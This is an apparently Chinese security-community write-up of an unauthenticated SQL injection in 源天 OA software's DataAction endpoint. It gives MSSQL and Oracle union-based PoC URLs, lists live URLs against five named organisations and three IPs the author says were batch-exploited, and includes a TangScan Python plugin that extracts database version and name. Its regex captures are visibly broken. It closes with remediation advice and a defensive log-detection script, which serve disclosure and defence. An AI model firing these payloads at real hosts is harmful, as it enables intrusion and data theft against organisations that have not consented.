Generic SQL injection in a certain OA system (某OA通用型SQL注入漏洞)
1) Generic SQL injection vulnerability. Vendor: 源天软件
Site: http://www.visionsoft.com.cn/
Vulnerable path: ServiceAction/com.velcro.base.DataAction
Note: this OA system is deployed on two database types, MSSQL and Oracle, so the case gives a PoC for each. The injection point is the sql parameter of this action: the client supplies the whole statement, and the PoC closes the intended WHERE clause with id='' and 1=2 and UNIONs a version string into the categoryids column that the action returns. PoC:
MsSql database:
ServiceAction/com.velcro.base.DataAction?sql=|20select|20categoryids|20from|20project|20where|20id='' and 1=2 union all select @@version&isworkflow=true
Oracle database:
ServiceAction/com.velcro.base.DataAction?sql=|20select|20categoryids|20from|20project|20where|20id='' and 1=2 union all select (select banner from sys.v_$version where rownum=1) from dual&isworkflow=true
Live targets (just open the URL in a browser):
MsSql part
A)http://km.best-team.com.cn/ServiceAction/com.velcro.base.DataAction?sql=|20select|20categoryids|20from|20project|20where|20id=%27%27%20and%201=2%20union%20all%20select%20@@version&isworkflow=true
B)http://bms.9square.com.cn/ServiceAction/com.velcro.base.DataAction?sql=|20select|20categoryids|20from|20project|20where|20id=%27%27%20and%201=2%20union%20all%20select%20@@version&isworkflow=true
C)http://oa.jsfuan.com/ServiceAction/com.velcro.base.DataAction?sql=|20select|20categoryids|20from|20project|20where|20id=%27%27%20and%201=2%20union%20all%20select%20@@version&isworkflow=true
Oracle part
D)http://winshare.com.cn/ServiceAction/com.velcro.base.DataAction?sql=|20select|20categoryids|20from|20project|20where|20id='' and 1=2 union all select (select banner from sys.v_$version where rownum=1) from dual&isworkflow=true
E)http://oa.mcds.com/ServiceAction/com.velcro.base.DataAction?sql=|20select|20categoryids|20from|20project|20where|20id=%27%27%20and%201=2%20union%20all%20select%20(select%20banner%20from%20sys.v_$version%20where%20rownum=1)%20from%20dual&isworkflow=true
2) As promised, in support of TangScan, here is the finished plugin code (I am a code illiterate and threw this together, gurus go easy). By the time this is published the plugin will already be in the TangScan.com repository.
#! /usr/bin/env python
# -*- coding: utf-8 -*-

"""
Copyright (c) 2013-2014 TangScan developers (http://www.wooyun.org/)
See the file 'docs/COPYING' for copying permission

author: fate0
"""

import re

from thirdparty import requests
from modules.exploit import TSExploit


__all__ = ['TangScan']


class TangScan(TSExploit):
    def __init__(self):
        super(self.__class__, self).__init__()
        self.info = {
            "name": "源天软件 OA office system SQL injection, MSSQL version (no login required)",
            "product": "源天",
            "product_version": "",
            "desc": """
                The sql parameter of /ServiceAction/com.velcro.base.DataAction in the OA
                office system is injectable, leading to disclosure of sensitive data
            """,
            "license": self.license.TS,
            "author": ["Coody"],
            "ref": [
                {self.ref.wooyun: "none yet"},
            ],
            "type": self.type.injection,
            "severity": self.severity.high,
            "privileged": False,
            "disclosure_date": "2015-07-22",
            "create_date": "2015-07-23",
        }

        self.register_option({
            "url": {
                "default": "",
                "required": True,
                "choices": [],
                "convert": self.convert.url_field,
                "desc": "target url"
            }
        })

        self.register_result({
            "status": False,
            "data": {
                "db_info": {
                    "version": "",
                    "current_db": ""
                }
            },
            "description": "",
            "error": ""
        })

    def verify(self):
        self.print_debug("verify start")

        # The delimiters around this capture group did not survive extraction of the
        # post; as written the pattern captures from the first character of the body.
        re_version_pattern = re.compile(r'(.+?)', re.IGNORECASE | re.DOTALL | re.MULTILINE)
        # UNION @@version onto the original query; the leaked banner comes back in the
        # categoryids column of the response.
        exp_url = ("{domain}/ServiceAction/com.velcro.base.DataAction?sql=|20select|20categoryids|20from|20project|20where|20id='' and 1=2 union all select @@version&isworkflow=true".format(domain=self.option.url))

        try:
            response = requests.get(exp_url, timeout=15, verify=False)
        except Exception as e:
            self.result.error = str(e)
            return

        re_result = re_version_pattern.findall(response.content)
        if len(re_result) == 0:
            self.result.status = False
            return

        self.result.status = True
        self.result.data.db_info.version = re_result[0]
        self.result.description = "Target {url} is SQL-injectable; database version: {db_version}".format(
            url=self.option.url,
            db_version=re_result[0]
        )

    def exploit(self):
        self.print_debug("exploit start")

        re_userinfo_pattern = re.compile(r'(.+?)', re.IGNORECASE | re.DOTALL | re.MULTILINE)
        # Same injection, this time UNIONing db_name() to read the current database name.
        exp_url = ("{domain}/ServiceAction/com.velcro.base.DataAction?sql=|20select|20categoryids|20from|20project|20where|20id='' and 1=2 union all select db_name()&isworkflow=true".format(domain=self.option.url))

        try:
            response = requests.get(exp_url, timeout=15, verify=False)
        except Exception as e:
            self.result.error = str(e)
            return

        re_result = re_userinfo_pattern.findall(response.content)
        if len(re_result) == 0:
            self.result.status = False
            return

        self.result.status = True
        self.result.data.db_info.current_db = re_result[0]
        self.result.description = "Target {url} is SQL-injectable; database name: {current_db}".format(
            url=self.option.url,
            current_db=self.result.data.db_info.current_db
        )


if __name__ == '__main__':
    from modules.main import main
    main(TangScan())

Here is the result of running the plugin:
Running --mode verify (the default):
Running --mode exploit:
The plugin runs fine and outputs the data. This should have been the end of it,
but I couldn't leave it alone,
so here are the test results of a batch-detection script.
The sites tested were:
http://60.12.113.234:8080/
http://121.14.195.31:8081/
http://218.246.22.194:8080/
For the test I ran --mode exploit directly, grabbing the database names in batch.
After the run, here is the content of the result file success.txt:
Right, this is where it ends.
Remediation:
Filter the sql parameter. Since the parameter carries a complete SQL statement from the client, keyword filtering can only be a stopgap; the endpoint should not accept client-supplied SQL at all.
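While the endpoint is being fixed, defenders can at least see the probes. The block below is an added example, not part of the original post: a log-side detection for this action that decodes the sql parameter (normalising the "|20" spacing seen in the PoCs as well as ordinary %20) and rates any request that ships raw SQL as "info" and one carrying the UNION or version tokens from the PoCs as "high". The access-log lines in SAMPLE_LOG are constructed (documentation-range IPs, hypothetical timestamps), not real traffic.

```python
import re
from urllib.parse import unquote

ENDPOINT = "/ServiceAction/com.velcro.base.DataAction"

# Constructed combined-log-style lines, not real traffic. Lines 1 and 2 are the
# verify and exploit requests from the write-up, line 3 is an ordinary-looking call
# to the same action, line 4 is unrelated.
SAMPLE_LOG = """\
203.0.113.5 - - [22/Jul/2015:10:01:02 +0800] "GET /ServiceAction/com.velcro.base.DataAction?sql=|20select|20categoryids|20from|20project|20where|20id=%27%27%20and%201=2%20union%20all%20select%20@@version&isworkflow=true HTTP/1.1" 200 512
203.0.113.5 - - [22/Jul/2015:10:01:03 +0800] "GET /ServiceAction/com.velcro.base.DataAction?sql=|20select|20categoryids|20from|20project|20where|20id=%27%27%20and%201=2%20union%20all%20select%20db_name()&isworkflow=true HTTP/1.1" 200 480
198.51.100.7 - - [22/Jul/2015:10:02:00 +0800] "GET /ServiceAction/com.velcro.base.DataAction?sql=|20select|20categoryids|20from|20project|20where|20id=%2742%27&isworkflow=true HTTP/1.1" 200 300
198.51.100.7 - - [22/Jul/2015:10:02:05 +0800] "GET /login.jsp HTTP/1.1" 200 2048
"""

REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+)')

# Tokens the PoCs rely on and a product query never should: a UNION, the version
# function or view, db_name(), or the "from dual" that gives Oracle a row source.
SQLI_RE = re.compile(
    r"\bunion\b.*\bselect\b|@@version|\bdb_name\s*\(|\bv_?\$version\b|\bfrom\s+dual\b",
    re.IGNORECASE)


def decode_sql_param(path):
    """Decoded sql parameter of a DataAction request path, or None when the request
    is for another path or carries no sql parameter. "|20" is turned into a space
    before percent-decoding so both spellings of the payload are matched."""
    if not path.startswith(ENDPOINT + "?"):
        return None
    for pair in path.split("?", 1)[1].split("&"):
        if pair.startswith("sql="):
            return unquote(pair[len("sql="):].replace("|20", " ")).strip()
    return None


def classify(line):
    """Alert dict for a DataAction request carrying raw SQL, or None for anything
    else. Severity is 'high' when the statement contains UNION/version tokens."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    sql = decode_sql_param(m.group("path"))
    if sql is None:
        return None
    severity = "high" if SQLI_RE.search(sql) else "info"
    return {"ip": m.group("ip"), "ts": m.group("ts"), "severity": severity, "sql": sql}


def scan(log_text):
    """All alerts from a block of log text, in order of appearance."""
    return [a for a in (classify(line) for line in log_text.splitlines()) if a]


if __name__ == "__main__":
    for alert in scan(SAMPLE_LOG):
        print("%(severity)-4s %(ip)s %(ts)s  sql=%(sql)s" % alert)
```

Alerting on every raw-SQL request, not only on the known payload, is deliberate: an attacker who simply rewrites the legitimate statement (line 3 with a different WHERE clause) never trips a keyword rule, and the volume of "info" alerts is itself the measure of how exposed the action is.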